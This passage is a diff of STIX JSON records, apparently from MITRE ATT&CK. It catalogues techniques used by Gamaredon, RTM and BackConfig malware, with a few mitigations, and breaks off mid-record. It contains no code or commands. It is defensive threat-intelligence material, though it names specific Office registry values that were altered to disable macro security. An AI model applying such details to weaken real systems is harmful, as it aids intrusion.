+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) has collected files from infected systems and uploaded them to a C2 server.(Citation: ESET Gamaredon June 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--430afd29-f2c0-43d3-b7bf-e7a549960254",
+ "type": "relationship",
+ "modified": "2020-06-16T17:53:18.764Z",
+ "created": "2020-06-16T17:53:18.764Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64",
+ "external_references": [
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) malware can insert malicious macros into documents using a Microsoft.Office.Interop object.(Citation: ESET Gamaredon June 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--69513daf-2acd-4b04-a7be-9f31174a2ae9",
+ "type": "relationship",
+ "modified": "2020-06-22T18:27:32.047Z",
+ "created": "2020-06-16T17:53:18.768Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--830c9528-df21-472c-8c14-a036bf17d665",
+ "external_references": [
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used GitHub repositories for downloaders which will be obtained by the group's .NET executable on the compromised system.(Citation: ESET Gamaredon June 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--fa7887c3-d49d-4499-9ee4-f9a504ce7dec",
+ "type": "relationship",
+ "modified": "2020-06-22T18:52:36.952Z",
+ "created": "2020-06-16T17:53:18.771Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "external_references": [
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) has created a scheduled task to launch an executable every 10 minutes.(Citation: ESET Gamaredon June 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--d65c9c85-2206-46c0-b55b-4fe2bd022c41",
+ "type": "relationship",
+ "modified": "2020-06-16T17:53:18.776Z",
+ "created": "2020-06-16T17:53:18.776Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617",
+ "external_references": [
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) has compiled the source code for a downloader directly on the infected system using the built-in Microsoft.CSharp.CSharpCodeProvider class.(Citation: ESET Gamaredon June 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--2278eb19-1ff4-4406-ab79-03108732330c",
+ "type": "relationship",
+ "modified": "2020-06-16T17:53:18.779Z",
+ "created": "2020-06-16T17:53:18.779Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5",
+ "external_references": [
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) has obfuscated .NET executables by inserting junk code.(Citation: ESET Gamaredon June 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--28c17b23-901c-46d5-84f2-544401f68d83",
+ "type": "relationship",
+ "modified": "2020-06-16T17:53:18.782Z",
+ "created": "2020-06-16T17:53:18.782Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) macros can scan for Microsoft Word and Excel files to inject with additional malicious macros.(Citation: ESET Gamaredon June 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--16b915ff-7bf5-4032-b39a-9c8073847d77",
+ "type": "relationship",
+ "modified": "2020-06-16T17:53:18.787Z",
+ "created": "2020-06-16T17:53:18.787Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579",
+ "external_references": [
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) has delivered macros which can tamper with Microsoft Office security settings.(Citation: ESET Gamaredon June 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--7464b3a1-f7ab-481b-97d4-c98199e0a387",
+ "type": "relationship",
+ "modified": "2020-06-16T17:53:18.825Z",
+ "created": "2020-06-16T17:53:18.825Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--9e7452df-5144-4b6e-b04a-b66dd4016747",
+ "external_references": [
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used an Outlook VBA module on infected systems to send phishing emails with malicious attachments to other employees within the organization.(Citation: ESET Gamaredon June 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--109bbda3-f97a-4067-81d6-ed635f251282",
+ "type": "relationship",
+ "modified": "2020-06-22T19:08:12.489Z",
+ "created": "2020-06-16T17:53:18.964Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "external_references": [
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) has removed security settings for VBA macro execution by changing registry values HKCU\\Software\\Microsoft\\Office\\<version>\\<product>\\Security\\VBAWarnings and HKCU\\Software\\Microsoft\\Office\\<version>\\<product>\\Security\\AccessVBOM.(Citation: ESET Gamaredon June 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--5edb6931-3262-40a9-acce-3016ac4153d4",
+ "type": "relationship",
+ "modified": "2020-06-22T21:18:35.700Z",
+ "created": "2020-06-16T17:53:19.061Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) has delivered self-extracting 7z archive files within malicious document attachments.(Citation: ESET Gamaredon June 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--dd84b767-1623-421b-8f31-048924be5f17",
+ "type": "relationship",
+ "modified": "2020-06-16T17:53:19.063Z",
+ "created": "2020-06-16T17:53:19.063Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--cc2399fd-3cd3-4319-8d0a-fbd6420cdaf8",
+ "target_ref": "attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4",
+ "relationship_type": "mitigates",
+ "description": "Routinely check user permissions to ensure only the expected users have the capability to delete new instances.",
+ "id": "relationship--ba3d7819-9e07-4d90-93f1-e5fe9c63201f",
+ "type": "relationship",
+ "modified": "2020-06-17T19:53:14.984Z",
+ "created": "2020-06-16T18:32:29.496Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--93e7968a-9074-4eac-8ae9-9f5200ec3317",
+ "target_ref": "attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4",
+ "relationship_type": "mitigates",
+ "description": "Limit permissions for deleting new instances in accordance with least privilege. Organizations should limit the number of users within the organization with an IAM role that has administrative privileges, strive to reduce all permanent privileged role assignments, and conduct periodic entitlement reviews on IAM users, roles and policies.(Citation: Mandiant M-Trends 2020)",
+ "id": "relationship--393a7e7b-0fe7-4b93-920f-fc1b62652c5a",
+ "external_references": [
+ {
+ "source_name": "Mandiant M-Trends 2020",
+ "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
+ "description": "FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020."
+ }
+ ],
+ "type": "relationship",
+ "modified": "2020-06-17T19:53:15.029Z",
+ "created": "2020-06-16T18:32:29.507Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "attack-pattern--0708ae90-d0eb-4938-9a76-d0fc94f6eec1",
+ "target_ref": "attack-pattern--144e007b-e638-431d-a894-45d90c54ab90",
+ "relationship_type": "subtechnique-of",
+ "id": "relationship--8b66ef05-63ad-4b12-b6b3-9a44475d781c",
+ "type": "relationship",
+ "modified": "2020-06-16T18:42:20.836Z",
+ "created": "2020-06-16T18:42:20.836Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "attack-pattern--3b4121aa-fc8b-40c8-ac4f-afcb5838b72c",
+ "target_ref": "attack-pattern--0708ae90-d0eb-4938-9a76-d0fc94f6eec1",
+ "relationship_type": "revoked-by",
+ "id": "relationship--a03f53c2-4445-4ca5-ab2a-624afcbb9ea4",
+ "type": "relationship",
+ "modified": "2020-06-16T18:44:16.269Z",
+ "created": "2020-06-16T18:44:16.269Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[RTM](https://attack.mitre.org/software/S0148) has initiated connections to external domains using HTTPS.(Citation: Unit42 Redaman January 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--b1c26420-ee32-44db-9158-781d38d7cc3b",
+ "type": "relationship",
+ "modified": "2020-06-16T20:51:12.866Z",
+ "created": "2020-06-16T20:51:12.866Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
+ "target_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c",
+ "external_references": [
+ {
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[RTM](https://attack.mitre.org/software/S0148) has named the scheduled task it creates \"Windows Update\".(Citation: Unit42 Redaman January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--874d4046-5b9a-4f60-88f4-79ae63a70a1e",
+ "type": "relationship",
+ "modified": "2020-06-16T20:51:13.038Z",
+ "created": "2020-06-16T20:51:13.038Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
+ "target_ref": "attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d",
+ "external_references": [
+ {
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[RTM](https://attack.mitre.org/software/S0148) can detect if it is running within a sandbox or other virtualized analysis environment.(Citation: Unit42 Redaman January 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--73d5e6ab-9d0c-4884-9db0-02033523e61a",
+ "type": "relationship",
+ "modified": "2020-06-16T20:51:13.040Z",
+ "created": "2020-06-16T20:51:13.040Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[RTM](https://attack.mitre.org/software/S0148) has relied on users opening malicious email attachments, decompressing the attached archive, and double-clicking the executable within.(Citation: Unit42 Redaman January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--e0b775d4-cfc4-4075-a72b-6a866ef3c159",
+ "type": "relationship",
+ "modified": "2020-06-16T20:51:13.210Z",
+ "created": "2020-06-16T20:51:13.210Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
+ "target_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0",
+ "external_references": [
+ {
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[RTM](https://attack.mitre.org/software/S0148) has been delivered as archived Windows executable files masquerading as PDF documents.(Citation: Unit42 Redaman January 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--f981c633-9333-4c7d-a168-7bea28f64d52",
+ "type": "relationship",
+ "modified": "2020-06-16T20:51:13.213Z",
+ "created": "2020-06-16T20:51:13.213Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
+ "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
+ "external_references": [
+ {
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[RTM](https://attack.mitre.org/software/S0148) has been delivered via spearphishing attachments disguised as PDF documents.(Citation: Unit42 Redaman January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--2b948c49-f65d-4e60-969f-229030b4d311",
+ "type": "relationship",
+ "modified": "2020-06-16T20:51:13.228Z",
+ "created": "2020-06-16T20:51:13.228Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--e3388c78-2a8d-47c2-8422-c1398b324462",
+ "target_ref": "attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e",
+ "relationship_type": "mitigates",
+ "description": "Remove vulnerable Group Policy Preferences.(Citation: Microsoft MS14-025)",
+ "id": "relationship--b3a191f3-59be-4457-ad5c-085ea0391bfe",
+ "external_references": [
+ {
+ "source_name": "Microsoft MS14-025",
+ "description": "Microsoft. (2014, May 13). MS14-025: Vulnerability in Group Policy Preferences could allow elevation of privilege. Retrieved January 28, 2015.",
+ "url": "http://support.microsoft.com/kb/2962486"
+ }
+ ],
+ "type": "relationship",
+ "modified": "2020-06-17T14:25:38.427Z",
+ "created": "2020-06-17T13:45:45.043Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--c13d9621-aca7-436b-ab3d-3a95badb3d00",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "description": "[BackConfig](https://attack.mitre.org/software/S0475) has the ability to use HTTPS for C2 communiations.(Citation: Unit 42 BackConfig May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--c3086516-a419-4e7f-87c4-e37f08d0f27a",
+ "type": "relationship",
+ "modified": "2020-06-29T15:22:59.188Z",
+ "created": "2020-06-17T20:39:12.746Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--c13d9621-aca7-436b-ab3d-3a95badb3d00",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "description": "[BackConfig](https://attack.mitre.org/software/S0475) has used a custom routine to decrypt strings.(Citation: Unit 42 BackConfig May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--e823be4b-50b9-4430-9010-e960b46bdfcc",
+ "type": "relationship",
+ "modified": "2020-06-17T20:39:12.751Z",
+ "created": "2020-06-17T20:39:12.751Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--c13d9621-aca7-436b-ab3d-3a95badb3d00",
+ "target_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9",
+ "external_references": [
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "description": "[BackConfig](https://attack.mitre.org/software/S0475) has compromised victims via links to URLs hosting malicious content.(Citation: Unit 42 BackConfig May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--efcd3e1b-d17b-4c7f-97fd-b438ebef6760",
+ "type": "relationship",
+ "modified": "2020-06-29T15:22:59.285Z",
+ "created": "2020-06-17T20:39:12.755Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
+ "target_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58",
+ "external_references": [
+ {
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
+ }
+ ],
+ "description": "[RTM](https://attack.mitre.org/software/S0148) can scan victim drives to look for specific banking software on the machine to determine next actions.(Citation: ESET RTM Feb 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--f60ed279-c720-4906-9e63-3cd7ce49e1e0",
+ "type": "relationship",
+ "modified": "2020-06-18T16:12:54.219Z",
+ "created": "2020-06-18T16:12:54.219Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
+ "target_ref": "attack-pattern--232a7e42-cd6e-4902-8fe9-2960f529dd4d",
+ "external_references": [
+ {
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
+ }
+ ],
+ "description": "[RTM](https://attack.mitre.org/software/S0148) can search for specific strings within browser tabs using a Dynamic Data Exchange mechanism.(Citation: ESET RTM Feb 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--6975d10a-91bf-4a22-8353-745de444c594",
+ "type": "relationship",
+ "modified": "2020-06-18T16:12:54.239Z",
+ "created": "2020-06-18T16:12:54.239Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
+ }
+ ],
+ "description": "[RTM](https://attack.mitre.org/software/S0148) can use the FindNextUrlCacheEntryA and FindFirstUrlCacheEntryA functions to search for specific strings within browser history.(Citation: ESET RTM Feb 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--9ae8ed36-348a-4053-bfa2-81fd0cc774aa",
+ "type": "relationship",
+ "modified": "2020-06-18T16:12:54.243Z",
+ "created": "2020-06-18T16:12:54.243Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--c13d9621-aca7-436b-ab3d-3a95badb3d00",
+ "target_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d",
+ "external_references": [
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "description": "[BackConfig](https://attack.mitre.org/software/S0475) has the ability to set folders or files to be hidden from the Windows Explorer default view.(Citation: Unit 42 BackConfig May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--bf0fd2a9-0852-4a4e-a806-281c0a7d63e3",
+ "type": "relationship",
+ "modified": "2020-06-18T17:27:09.295Z",
+ "created": "2020-06-18T17:27:09.295Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--c13d9621-aca7-436b-ab3d-3a95badb3d00",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
